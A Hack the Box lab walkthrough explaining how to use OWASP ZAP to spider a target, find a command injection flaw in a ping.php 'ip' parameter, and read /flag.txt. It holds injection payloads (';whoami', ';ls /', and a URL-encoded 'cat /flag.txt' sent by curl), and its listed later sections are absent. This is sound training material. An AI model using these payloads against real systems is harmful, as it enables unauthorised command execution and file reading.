HTB - ZAP Scanner — Reading the Flag /flag.txt

Hack the Box — ZAP Scanner — Read the Flag (/flag.txt)

---

---

Table of Contents

• Goal
• Tools
• Quick Start
• Step-by-step Walkthrough
  • 1. Start ZAP & Discover
  • 2. Inspect Endpoints
  • 3. Vulnerability — Command Injection
  • 4. Read the Flag
• Payload Breakdown
• Example: curl
• Checklist
• Notes & Safety
• Optional: automation script

---

Goal

Run OWASP ZAP against the target to discover directories and find a high-risk vulnerability that lets you read the flag at /flag.txt.

Target (example): http://94.237.54.192:48657
Replace with the current target when testing — the target changes.

---

Tools

• OWASP ZAP (Pwnbox: Pentest Programs)
• Browser with ZAP proxy configured
• curl (for quick verification)

---

Quick Start

1. Open ZAP in Pwnbox.
2. Add or visit the target while ZAP proxy is enabled.
3. Run Spider to enumerate directories.
4. Look for High Risk issues in the Sites/Alerts tabs.
5. Test suspected injection points and retrieve /flag.txt.

---

Step-by-step Walkthrough

1. Start ZAP & Discover

• Open ZAP in Pwnbox.
• Add the target manually or browse to it while ZAP proxy is enabled.
• Run Spider (important — finds endpoints that passive scanning might miss).

---

2. Inspect Endpoints

• Check the Sites tab after Spider finishes.
• Explore endpoints and check the Alerts list for High Risk findings.

---

3. Vulnerability — Command Injection

• Vulnerable endpoint discovered :

/devtools/ping.php?ip=

• Test for injection by sending payloads to ip, such as:

;whoami
;ls /

If you see command output, the app is executing shell commands from the ip parameter.

---

4. Read the Flag

• Use a payload that appends cat /flag.txt to the ip parameter (URL-encoded):

http://94.237.54.192:48657/devtools/ping.php?ip=127.0.0.1%3Bcat%20%2Fflag.txt

Example: curl

curl "http://94.237.54.192:48657/devtools/ping.php?ip=127.0.0.1%3Bcat%20%2Fflag.txt"

Expected output (example):

HTB{xxx-xxx-xxx}